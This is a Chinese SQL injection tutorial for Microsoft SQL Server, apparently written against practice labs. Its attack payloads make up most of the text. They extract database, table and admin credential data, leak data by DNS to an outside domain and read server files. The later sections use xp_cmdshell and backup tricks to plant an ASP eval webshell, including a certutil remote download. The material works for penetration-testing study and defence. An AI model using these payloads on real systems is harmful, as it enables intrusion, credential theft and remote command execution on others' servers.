前情提要

  1. 漏洞环境可以使用https://github.com/Larryxi/MSSQL-SQLi-Labs
  1. 或者网上找一些开放的靶场,比如 https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe
  1. 大多数注入方法都与MYSQL注入篇相似,但是MSSQL比MYSQL相对权限要更大

联合查询(UNION)注入

概念

和Mysql可以说是一模一样,只是一些语句不同而已,如果可以操作SQL语句且有回显的情况下,就可以通过union构造语句返回直接返回结果。

注意

  1. union查询时,我们构造的select语句的字段数要和当前表的字段数相同才能联合查询,否则会抛出异常(可能是页面不会显示内容或者直接提示错误等)
  2. 若回显仅支持第一行数据的话,我们需要让union前边正常查询的语句返回的结果为空,才能让我们想要的数据展现出来;返回为空只需要让union前面的内容在数据库中查询不到结果即可
  3. unionunion all区别
  • union: 对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序
  • union all: 对两个结果集进行并集操作,包括重复行,不进行排序

注入流程

确认字段

  1. order by 4 -- 页面正常
  2. order by 5 -- 页面不正常

image-20211222165606706
说明有4列字段

确认显位

  1. id=-2 union all select '1','2','3','4'

-是为了让union查询前部分无结果,以便显示后部分的查询结果
这里1 2 3 4都用单引号引起来,是因为如果直接用数字型的1 2 3 4,有些地方类型转换会出现错误,导致无法显示出来,所以建议用'1'或者null
可以很明显的看出来显位是2和3
image-20211222165900941

查询数据

  • 查询是否是sysadmin,以及本地服务器名称 ``` id=-2 union all select ‘1’,str(is_srvrolemember(‘sysadmin’)),@@servername,’4’
  1. ![image-20211222171533649](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990729774-53f73e9b-5a32-42d2-b134-76b1624a93ae.png)
  2. - **查询当前数据库和数据库用户**

-2 union all select ‘1’,db_name(),user,’4’

  1. ![image-20211222171938390](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990730971-3f9fd5dc-ee5e-45c3-b062-9133c53a9707.png)<br />使用如下方法也可以查询当前数据库名

id=-2 union all select ‘1’,catalog_name,’3’,’4’ from information_schema.schemata

  1. ![image-20211222174435121](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990731859-71328898-08cd-4ac7-af23-35c82a892419.png)
  2. - **查询其他数据库**
  3. **第一种方法:**可以直接通过遍历`db_name(n)`中的n值来查询

id=-2 union all select ‘1’,db_name(1),db_name(2),’4’

  1. ![image-20211222172038569](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990732799-1877aa46-cc6c-4596-83df-d63c30e69aff.png)<br />**第二种方法:**也可以通过查询`master..sysdatabases`来获取数据库名

id=-2 union all select ‘1’,name,’3’,’4’ from master..sysdatabases — master id=-2 union all select ‘1’,name,’3’,’4’ from master..sysdatabases where name != ‘master’ — model id=-2 union all select ‘1’,name,’3’,’4’ from master..sysdatabases where name not in (‘master’,’model’) — mozhe_db_v2

  1. ![image-20211222174311500](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990733936-64756540-0383-4fae-a564-35f02b3ce1da.png)
  2. - **查询数据库的表名**
  3. 在获取了当前的数据库后,需要获取当前数据库的表,使用`current_database..sysobjects`(此时`current_database``mozhe_db_v2`,所以为`mozhe_db_v2..systobjects`),条件为`U`(用户表)

查当前数据库的第一个表(默认使用当前数据库)

id=-2 union all select top 1 ‘1’,name,’3’,’4’ from sysobjects where xtype=’u’ id=-2 union all select top 1 ‘1’,name,’3’,’4’ from mozhe_db_v2..sysobjects where xtype=’u’

查当前数据库的第二个表(默认使用当前数据库)

id=-2 union all select top 1 ‘1’,name,’3’,’4’ from sysobjects where xtype=’u’ and name not in (‘manage’)

查master数据库的第一个表

id=-2 union all select top 1 ‘1’,name,’3’,’4’ from master..sysobjects where xtype=’u’

  1. ![image-20211223095106953](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990735070-f458f84a-366f-4c35-adce-85d04d986a99.png)

查当前数据库的第一个表(默认使用当前数据库)

select top 1 table_name from information_schema.tables

查询master库第一个表名

select top 1 table_name from master.information_schema.tables

  1. **二者区别:**
  2. 1. `database.information_schema.tables`包含视图
  3. 1. `database..sysobjects where xtype = 'U'`只包含用户创建的表
  4. - **查询列名**
  5. 现在已经知道了表名为`manage`,尝试查询列名

支持跨库查询

-2 union all select top 1 ‘1’,name,’3’,’4’ from syscolumns where id = (select id from sysobjects where name=’manage’) — id -2 union all select top 1 ‘1’,name,’3’,’4’ from syscolumns where id = (select id from sysobjects where name=’manage’) and name != ‘id’ — username -2 union all select top 1 ‘1’,name,’3’,’4’ from syscolumns where id = (select id from sysobjects where name=’manage’) and name not in (‘id’,’username’) — password

也可用

-2 union all select top 1 ‘1’,column_name,’3’,’4’ from information_schema.columns where table_name = ‘manage’ -2 union all select top 1 ‘1’,column_name,’3’,’4’ from mozhe_db_v2.information_schema.columns where table_name = ‘manage’

  1. ![image-20211223095551325](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990736445-de00097e-8257-42e9-8913-cf5cbed60dfb.png)

不支持跨库查询

-2 union all select top 1 ‘1’,name,’3’,’4’ from syscolumns where id = OBJECT_ID(‘manage’)

也可用

-2 union all select top 1 ‘1’,(select top 1 col_name(object_id(‘manage’),1) from sysobjects),’3’,’4’ -2 union all select top 1 ‘1’,(select top 1 col_name(object_id(‘manage’),1) from sysobjects),’3’,’4’

  1. ![image-20211223100716469](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990737867-41d8fa2c-cf33-4ac3-9a3d-ccabeda90d04.png)
  2. - **查值**
  3. 现在我们已经知道表名、列名了,就可以直接查值了

select 列名 from 表名;

-2 union all select ‘1’,username,password,’4’ from manage

  1. ![image-20211223100853063](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990739042-52c26fcd-df0d-4ada-a0af-9c17d43d6327.png)
  2. ### 总结
  3. 过程和mysql一模一样,区别就是一些语句的用法差异
  4. ## 报错注入
  5. ### 概念
  6. 报错注入通常情况下在服务器开启报错信息返回,也就是发生错误时返回报错信息,通过特殊函数的错误使用使其参数被页面输出。<br />常见的报错注入出现在类型转换错误的情况下,如给`db_name()`强制转换为`int`,就会抛出包含数据库名的异常信息。
  7. ### 注入举例
  8. > 没有自己搭环境,抄几张罗总的截图,**谢谢罗总**
  9. 语句都和联合注入中一样,只不过替换过来稍作修改即可

select * from users where id = ‘1’ and 1 = convert(int,db_name())—+

  1. ![img](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990739960-d0c4f007-2ef9-4044-8d71-a27f5bae1d01.png)
  2. ### 报错函数
  3. #### convert()
  4. **函数说明:**<br />`CONVERT()`函数是把⽇期转换为新数据类型的通⽤函数。

CONVERT(data_type(length), data_to_be_converted, style) / 注释 : data_type(length) 转换为⽬标数据类型(带有可选的长度)。 data_to_be_converted 含有需要转换的值。 style 规定⽇期/时间的输出格式。 */

  1. **报错原理:**<br />对于 `convert(int,@@version)`convert 函数⾸先会执⾏第⼆个参数指定的SQL查询,然后尝试将查询结果转换为int类型。但是,由于这个SQL查询的结果是varchar类型,⽆法进⾏指定的转换,所以,convert函数会抛出 ⼀个SQL server错误消息,指出“SQL查询结果”⽆法转换为“int”类型,这样就能得到的这个SQL查询的结果了。

select * from users where id = ‘1’ and 1 = convert(int,db_name())—+

  1. ![img](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990739960-d0c4f007-2ef9-4044-8d71-a27f5bae1d01.png)
  2. #### cast()
  3. **函数说明:**<br />此函数将一种数据类型的表达式转换为另一种数据类型。

CAST ( expression AS data_type [ ( length ) ] )
/ expression:任何有效的表达式。 data_type:目标数据类型。这包括 xml、bigint 和 sql_variant;不能使用别名数据类型。 length:一个可选的整数,用于指定目标数据类型的长度,用于允许用户指定长度的数据类型;默认值为 30。 */

  1. **报错原理:**<br />强制类型转换时,如果类型不匹配将会将数据通过异常的形式抛出

select * from users where id = ‘1’ and 1 = cast((select top 1 name from test..sysobjects where xtype = ‘u’ and name not in (‘users’)) as varchar)—+

  1. ![img](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990742057-faf10225-ee60-4330-8473-4ef2e26bc23a.png)

SELECT cast(@@version as int)

  1. #### 除法
  2. **说明:**<br />在进行除法运算时,如`1/db_name()`,会尝试将`db_name()`转化为`int`而抛出异常信息(隐式转换)

select 1/db_name()

  1. #### > < =
  2. **说明:**<br />和上面一样比较时类型转换错误,数字前面也可以加一些其他的运算符,比如`~``-`等,可能有绕过的作用

select from users where id = ‘1’ and (select top 1 name from test..sysobjects where xtype= ‘u’ and name not in (‘users’)) > 0—+ select from users where id = ‘1’ and (select top 1 name from test..sysobjects where xtype= ‘u’ and name not in (‘users’)) = 0—+ select * from users where id = ‘1’ and (select top 1 name from test..sysobjects where xtype= ‘u’ and name not in (‘users’)) < 0—+

  1. ![img](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990743384-6e231982-2626-4b16-9748-7100e22ac8a2.png)
  2. #### db_name()
  3. **函数说明:**<br />此函数返回指定数据库的名称

DB_NAME ([ database_id ]) / 名称DB_NAME将返回的数据库的标识号 (ID) 。如果调用DB_NAME省略database_id,则DB_NAME返回当前数据库的名称。 返回nvarchar(128) */

  1. **报错原理:**<br />会强制将 `database_id` 的值转换为 `smallint`类型,而查询出来的结果为`nvarchar`,因此导致抛出异常

select * from users where id = ‘1’ and 1 = db_name((select top 1 name from test..sysobjects where xtype = ‘u’ and name not in (‘users’)))—+

  1. ![img](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990744655-19f96058-9059-4819-98f6-150e3f34c11e.png)
  2. #### file_name()
  3. **函数说明:**<br />此函数返回给定文件标识 (ID) 号的逻辑文件名

file_name(id) / 其文件名的文件标识号FILE_NAME。file_id具有int数据类型。返回nvarchar(128) file_ID对应于 sys.master_files 目录视图或 sys.database_files 目录视图中的 file_id 列。 */

  1. **报错原理:**<br />和上面一样,类型转换出错,下面一样的就不再写原理了

select * from users where id = ‘1’ and 1 = file_name((select top 1 name from test..sysobjects where xtype = ‘u’ and name not in (‘users’)))—+

  1. #### filegroup_name()
  2. **函数说明:**<br />此函数返回指定文件组标识 (ID) 号的文件组名称。

FILEGROUP_NAME ( filegroup_id ) / filegroup_id: 将返回其文件组名称 FILEGROUP_NAME 的文件组 ID 号,filegroup_id 具有 smallint 数据类型。 */

  1. ```
  2. select * from users where id = '1' and 1 = filegroup_name((select top 1 name from test..sysobjects where xtype = 'u' and name not in ('users')))--+

col_name()

函数说明:
此函数根据表列的表标识号和列标识号值返回表列的名称

  1. COL_NAME ( table_id , column_id )
  2. /* *
  3. table_id 自变量具有一个 int 数据类型
  4. column_id 自变量具有一个 int 数据类型,返回系统名称
  5. */
  1. select * from users where id = '1' and 1 = col_name(1, (select top 1 name from test..sysobjects where xtype = 'u' and name not in ('users')))--+

object_name()

函数说明:
此函数返回架构范围内对象的数据库对象名称

  1. OBJECT_NAME ( object_id [, database_id ] )
  2. /* *
  3. object_id 的数据类型为 int,并假定为指定数据库或当前数据库上下文中的架构范围内的对象
  4. database_id 的数据类型为 int。要在其中查找对象的数据库的 ID
  5. 返回sysname
  6. */
  1. select * from users where id = '1' and 1 = object_name((select top 1 name from test..sysobjects where xtype = 'u' and name not in ('users')))--+

type_name()

函数说明:
返回指定类型 ID 的未限定的类型名称

  1. TYPE_NAME ( type_id )
  2. /* *
  3. type_id 的数据类型为 int,它可以引用调用方有权访问的任意架构中的类型。返回sysname
  4. */
  1. select * from users where id = '1' and 1 = type_name((select top 1 name from test..sysobjects where xtype = 'u' and name not in ('users')))--+

schema_name()

函数说明:
返回与架构 ID 关联的架构名称

  1. SCHEMA_NAME ( [ schema_id ] )
  2. /* *
  3. schema_id 架构的 ID。
  4. schema_id 是 int。如果没有定义 schema_id,则 SCHEMA_NAME 将返回调用方的默认架构的名称。
  5. schema_id 不是有效 ID 时,返回 NULL。
  6. * /

其他函数

上面连续很多的函数都是参数类型的问题,导致异常,其他还有很多,比如

  • SUSER_NAME()
  • USER_NAME()
  • PERMISSIONS()
  • having 1=1 爆表名

    说明:
    having需要与聚合函数group by一起使用,当无group by时,会直接爆出当前表 ``` select * from users where id=’1’ having 1=1;
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990746209-60280130-29a0-49a9-9b9a-d40fd67be8d9.png)
  2. #### group by ... having 1=1 爆列名

select * from users where id=’1’ group by username,id having 1=1;

  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990747428-29a9a438-3283-4013-a780-abac0f5535a3.png)
  2. ## 盲注
  3. ### 布尔盲注
  4. 也和mysql一样,不过是一些语句的差异,主要利用语法

如果condition为真,那么整条where语句仍然为真

如果condition为假,那么整条where语句为假

select * from users where username=$username and (condition)

  1. #### 注入判断
  2. 一般通过一些表达式的差异性来确认结果

and 2*3 = 6 — 正常回显

  1. ![image-20211223101950716](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990748749-db53f715-b0c8-4e0e-b126-c542eaefc1c5.png)

and 2*3 = 5 — 错误回显

  1. ![image-20211223102904970](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990749865-02dd53d9-d823-43d9-adcf-9c9a1c48688d.png)
  2. #### 常用函数
  3. - len()
  4. - ascii()
  5. - substring()
  6. - count()
  7. #### 注入举例
  8. 过程和mysql布尔盲注过程一样,流程也是判断长度->数据库名->表名->列名->值<br />语句和联合注入一样,只是因为属于盲注所以多了一些判定条件而已,这里举几个例子来抛砖引玉吧
  9. - 获取数据库名长度

id=2 and len(db_name()) > 10 — true id=2 and len(db_name()) > 11 — false id=2 and len(db_name()) = 11 — true

  1. 说明数据库长度为 11<br />![image-20211223103927411](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990750843-9fd521ab-cd88-42b1-83de-120321cf6239.png)
  2. - 查看数据库第一位

id=2 and ascii(substring(db_name(),1,1)) > 108 — true id=2 and ascii(substring(db_name(),1,1)) > 109 — false id=2 and ascii(substring(db_name(),1,1)) = 109 — true

也可以不转换为ascii码判断(最后得出数据库 mozhe_db_v2)

id=2 and substring(db_name(),1,1) = ‘m’ id=2 and substring(db_name(),11,1) = ‘2’

  1. ![image-20211223104246807](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990751874-04b0089f-dcb3-4980-9359-4e7135313b92.png)
  2. - 查看当前数据库有多少表

说明有2个表

id=2 and (select count(*) from sysobjects where xtype=’U’) = 2 — true

  1. - 查看第一个表的第一位

第一位是m

id=2 and ascii(substring((select top 1 name from sysobjects where xtype=’u’),1,1)) = 109 — true

  1. ### 时间盲注
  2. #### 注入判断
  3. 类似于布尔盲注,但是从页面内容看不出来差异,只能通过响应时间来判断,因此会用到延时函数 `waitfor delay`<br />WAITFORSQL ServerTransact-SQL提供的⼀个流程控制语句。它的作⽤就是等待特定时间,然后继续执⾏后 续的语句。它包含⼀个参数DELAY,⽤来指定等待的时间。<br />如果将该语句成功注⼊后,会造成数据库返回记录和 Web请求也会响应延迟特定的时间。由于该语句不涉及条件判断等情况,所以容易注⼊成功。<br />**语法:**

n 为延时多少秒

waitfor delay ‘0:0:n’

延时5秒

waitfor delay ‘0:0:5’

  1. **在MSSQL中,默认可使用堆叠查询,这个也是判断mssqlmysql的区别之一**,所以在判断注入点有三种方式,如下:
  2. - 方法一:直接带入查询

id=2 waitfor delay ‘0:0:5’

  1. ![image-20211223105616001](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990752686-5883f219-ddce-4689-a7a5-1cbb4ee65895.png)
  2. - 方法二:堆叠查询

id=2;waitfor delay ‘0:0:5’

  1. ![image-20211223105651467](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990754243-45dfed4c-e465-447d-b434-d6e1195c44ff.png)
  2. - 方法三:判断条件

id=2 if(1=1) waitfor delay ‘0:0:5’

  1. ![image-20211223105903701](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990755059-5abdf780-ec5c-4a39-aed6-9854a42d2c44.png)
  2. #### 常用函数
  3. 除了刚才布尔盲注用到的常用函数外,还使用到了如下的一些函数,主要是延时和条件判断
  4. - waitfor delay '0:0:n'
  5. - IF...ELSE...
  6. - case when exp then state1 ELSE state2 end
  7. #### 注入举例
  8. 还是举个例子吧,抛砖引玉,大家可以自由发挥
  9. - 判断当前数据库第一位是不是m

if(substring(db_name(),1,1)) = ‘m’ waitfor delay ‘0:0:5’

  1. ![image-20211223110755772](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990755674-80b2ccb9-0182-49f8-8cce-4b78cd4defc0.png)
  2. ## DNS带外(OOB)注入
  3. ### 概念
  4. mysql带外注入类似,只是语法不一样,限制条件不一样,可以用来简化盲注,快速获取数据<br />如果遇到带有禁用堆栈查询的完全盲SQL注入,则可尝试通过函数 `fn_xe_file_target_read_file``fn_get_audit_file``fn_trace_gettable`实现DNS带外(OOB)数据泄露。
  5. ### 利用举例
  6. 利用`fn_xe_file_target_read_file` `fn_trace_gettable`<br />限制:需要控制服务器权限

— 原文 exists(select from fn_xe_file_target_read_file(‘C:\.xel’,’\‘+(select db_name())+’.23c999e1.dns.1433.eu.org\1.xem’,null,null)) — URL编码后 id=2+and+exists(select++from+fn_xe_file_target_read_file(‘C:\.xel’,’\‘%2b(select+db_name())%2b’.23c999e1.dns.1433.eu.org\1.xem’,null,null))

— 原文 exists(select from fn_trace_gettable(‘\‘+(select db_name())+’.23c999e1.dns.1433.eu.org\1.trc’,default)) — URL编码后 id=2+and+exists(select++from+fn_trace_gettable(‘\‘%2b(select+db_name())%2b’.23c999e1.dns.1433.eu.org\1.trc’,default))

  1. ## 堆叠注入
  2. MSSQL 默认是可以多语句查询,通过分号`;`分割,其与mysql不同的是,MSSQL非常灵活,且可执行系统命令,当存在堆叠查询的语句中,就可以考虑执行系统命令,写入webshell,远程下载木马文件,执行命令getshell等等。

id=2;waitfor delay ‘0:0:5’

  1. ## Order by 注入
  2. ### 概念
  3. order by 注入通常出现在排序中,前端展示的表格,某一列需要进行升序或者降序排列,或者做排名比较的时候常常会用到`order by`排序,`order by`select语句中,紧跟在`where [where condition]`后,且order by 注入无法使用预编译来防御,由于order by 后面需要紧跟`column_name`,而预编译是参数化字符串,而`order by`后面紧跟字符串就会提示语法错误,通常防御order by 注入需要使用白名单的方式。
  4. ### 注入判断
  5. - 通过`order by 列名`,查看排序返回内容的顺序

order by name order by id

  1. - 通过超大数构成SQL语句错误

order by 999

  1. - 通过延时函数来判断

order by 1 if (1=1) waitfor delay ‘0:0:5’

  1. ### 注入举例
  2. #### 开启报错
  3. 有报错的情况下,可直接接报错注入函数来抛出异常,获取我们想要的数据

order by convert(int,db_name)—+

  1. ![img](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990756423-d298e216-d1e5-4ae2-aebc-8bd614fe6eff.png)
  2. #### 关闭报错
  3. 无报错的情况下,则考虑使用时间盲注来进行测试

order by 1 if (substring(db_name(),1,1)=’m’) waitfor delay ‘0:0:5’

  1. ![image-20211223141436257](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990758512-bcf377c3-74e3-4ebb-9178-4e83e8f022b6.png)
  2. ## 二次注入
  3. mysql二次注入,不多赘述
  4. ## 文件读写
  5. ### 概述
  6. MSSQL的文件操作要求要有两大前提:
  7. 1. 有相应的权限`db_owner`
  8. 1. 知道文件的绝对路径
  9. mssql中有两个存储过程可以帮我们来找绝对路径:`xp_cmdshell` `xp_dirtree`
  10. - **利用xp_dirtree方法来寻找**

execute master..xp_dirtree ‘c:’ — 列出所有c:\文件、目录、子目录 execute master..xp_dirtree ‘c:’,1 — 只列c:\目录 execute master..xp_dirtree ‘c:’,1,1 — 列c:\目录、文件

  1. ![img](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990759707-2e99be17-5a51-463c-96c3-57249389623a.png)<br />当实际利用的时候我们可以创建一个临时表把存储过程查询到的路径插入到临时表中

CREATE TABLE tmp (dir varchar(8000),num int,num1 int); insert into tmp(dir,num,num1) execute master..xp_dirtree ‘c:’,1,1; — 查询数据 select * from tmp;

  1. ![image-20211223152205815](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990760894-300cd066-2ba6-40ff-af97-6d309d027232.png)
  2. - **使用xp_cmdshell查找绝对路径**
  3. cmd中寻找某文件

for /r c:\ %i in (*.asp) do echo %i

  1. 因此只需要建立一个表存一个`varchar`字段就可以了

CREATE TABLE tmp (dir varchar(8000)); insert into tmp(dir) execute master..xp_cmdshell ‘for /r c:\ %i in (.asp) do echo %i’; — 查询数据 select from tmp;

  1. ### 读
  2. 1. 读取文件可以创建一个临时表,将本地文件写入该表中(无法远程登录的情况下,使用堆叠注入)

— 建立一个临时表 create table testtable(context ntext);

— 将本地文件写入表中 BULK INSERT testtable FROM ‘c:/windows/win.ini’ WITH ( DATAFILETYPE = ‘char’, KEEPNULLS );

— 查询数据 select context from testtable;

— 删除临时表 drop table testtable;

  1. ![image-20211223153027804](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990762332-082a23ab-ad6f-46f6-a82d-9ec0e66eb4c5.png)
  2. 2. 使用`OpenRowset()`函数直接读文件

(select x from OpenRowset(BULK ‘C:\Windows\win.ini’,SINGLE_CLOB) R(x))

  1. ![image-20211223154724201](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990763387-2b421ce6-a408-4200-8e67-4610d7857567.png)
  2. 2. 使用`xp_cmdshell`执行dos命令

— 有回显的情况下可以直接读 execute master..xp_cmdshell ‘type c:/windows/win.ini’;

— 也可以先写入到文件再读 CREATE TABLE tmp (dir varchar(8000)); insert into tmp(dir) execute master..xp_cmdshell ‘type c:/windows/win.ini’; — 查询数据 select * from tmp;

  1. ### 写
  2. 利用`xp_cmdshell`执行dos命令写文件<br />在得知绝对路径的情况下,可以使用echo写入webshell,如果需要换行则使用`>>`追加写入,注意如`=``>` 等前使用`^`来转义,也可以使用远程下载的方式来下载webshell

— 直接echo写入 exec master..xp_cmdshell ‘echo ^<%eval request(“cmd”)% ^>> C:\Inetpub\wwwroot\sqlilabs\test.asp’ — 远程下载 exec master..xp_cmdshell ‘certutil.exe -urlcache -split -f ““ C:\Inetpub\wwwroot\sqlilabs\test.asp’

  1. ### DB_owner权限LOG备份Getshell
  2. 无论是LOG备份还是差异备份,都是利用备份的过程中写入一句话木马<br />**SQLServer常见的备份策略:**
  3. - 每周一次完整备份
  4. - 每天一次差异备份
  5. - 每小时一次事务日志备份
  6. **利用前提**:
  7. - 目标机器存在数据库备份文件 ,也就是如果我们利用`test`数据库的话,则需要该test数据库存在数据库备份文件,而且恢复模式得是_完整模式_
  8. - 知道网站的绝对路径
  9. - 该注入支持堆叠注入
  10. **利用语句:**

— 修改数据库恢复模式为 完整模式 alter database 数据库名 set RECOVERY FULL; — 创建一张表cmd,只有一个列 a,类型为image create table cmd (a image); — 备份表到指定路径 backup log 数据库名 to disk= ‘C:\Inetpub\wwwroot\sqlilabs\1.asp’ with init; — 插入一句话到cmd表里,<%eval request(“cmd”)%> 的16进制 insert into cmd (a) values(0x3c256576616c20726571756573742822636d642229253e); — 把操作日志备份到指定文件 backup log 数据库名 to disk=’C:\Inetpub\wwwroot\sqlilabs\2.asp’; — 删除cmd表 drop table cmd;

  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990765303-f2482f57-19e6-4b3a-ae63-f5b62481beb2.png)<br />执行完成之后会在目标网站根目录下生成1.asp和2.asp文件,其中1.asp 保存数据库,2.asp就是我们需要连接的木马文件<br />![image.png](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990766822-b37e8879-d78b-4466-bf70-29a937850aec.png)
  2. ### DB_owner权限差异备份Getshell
  3. > 差异备份有概率会把网站搞崩,所以不建议使用差异备份
  4. **利用前提**:
  5. - 知道网站的绝对路径
  6. - 该注入支持堆叠注入
  7. **利用语句:**

create table [dbo].[test] ([cmd] [image]) insert into test values(0x3c256576616c20726571756573742822636d642229253e) backup database test to disk = ‘C:\Inetpub\wwwroot\1.asp’ Drop table [test]

  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990770079-184267fd-0c5c-4abc-81e7-be58a79112e6.png)
  2. ## 技巧
  3. ### 查询当前执行的SQL语句
  4. 可以从`Access sys.dm_exec_Requests``sys.dm_exec_sql_text`中检索当前正在执行的SQL查询<br />**权限:**如果user在服务器上拥有`VIEW SERVER STATE`权限,则用户将看到SQL Server实例上正在执行的所有会话;否则,user将仅看到当前会话。

id=-2 union all select ‘1’,’2’,(select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)),’4’

  1. ![image-20211223162609078](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646990771900-5bdb8400-5309-46cb-94a3-299017a3ff05.png)
  2. ### 一次查询获取所有内容
  3. 有两种简单的方法可以在一个查询中检索表的全部内容-使用`FOR XML``FOR JSON`子句。<br />FOR XML子句需要指定的模式,如«raw»,因此JSON比较简洁。

— 基于正常查询 select concat_ws(0x3a,table_schema,table_name,column_name) from information_schema.columns for json auto; select name,’,’ from master..sysdatabases for xml path(‘’);

— 基于报错 and 1=(select concat_ws(0x3a,table_schema,table_name,column_name)a from information_schema.columns for json auto)

```